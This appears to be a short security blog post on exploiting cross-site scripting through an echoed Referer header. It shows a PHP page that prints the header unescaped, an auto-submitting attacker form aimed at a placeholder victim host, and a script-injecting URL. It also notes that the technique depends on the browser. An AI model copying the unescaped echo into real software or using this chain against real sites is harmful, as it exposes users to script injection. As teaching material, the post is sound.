Exploiting cross-site scripting in Referer header
The application that echoes the Referer header is vulnerable to cross-site scripting. And it is perfectly exploitable. Here is how:
Suppose we have an application that generates a "Back" link from Referer header (let's call it vulnerable.php):
<?php echo '<a href="'; echo $_SERVER['HTTP_REFERER']; echo '">Back</a>\n'; ?>
<html> <body> <form id="xss" name="xss" method="GET" action="http://victim.example.com/vulnerable.php"> </form> <script> document.getElementById("xss").submit(); </script> </body> </html>
If the victim is tricked into visiting http://attacker.example.com/exploit.html?<script>alert(1);</script> he will end up on the vulnerable page with the Referer header containing XSS attack.
This attack works in Internet Explorer, but does not work in Firefox, because Firefox will URL-encode the naughty characters after the question mark. It may still be possible to exploit this with Firefox, but some trickery with mod_rewrite will be needed to have XSS data in the path, instead of in the query.